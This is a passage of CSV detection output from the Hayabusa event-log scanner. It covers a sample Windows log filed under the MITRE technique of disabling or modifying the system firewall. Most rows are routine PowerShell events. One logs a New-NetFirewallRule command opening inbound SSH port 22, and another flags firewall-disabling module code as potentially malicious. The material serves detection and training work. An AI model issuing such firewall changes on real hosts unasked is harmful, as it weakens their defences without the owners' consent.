Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.793 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.795 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.796 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,>,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.944 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.944 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.947 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $this.Exception.InnerException.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.947 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.948 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.948 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.948 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.949 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.950 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,":String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException """,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.954 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.954 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.957 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.958 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.958 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.958 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.959 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.976 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.980 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again."" CommandInvocation(Get-Command): ""Get-Command""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.985 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.994 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.998 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.999 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:30.001 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:30.043 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:30.044 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:30.046 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:43.608 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:43.609 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.641 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetFirewallRule' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.641 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetFirewallRule' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.642 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.652 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.653 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.654 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Show-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; 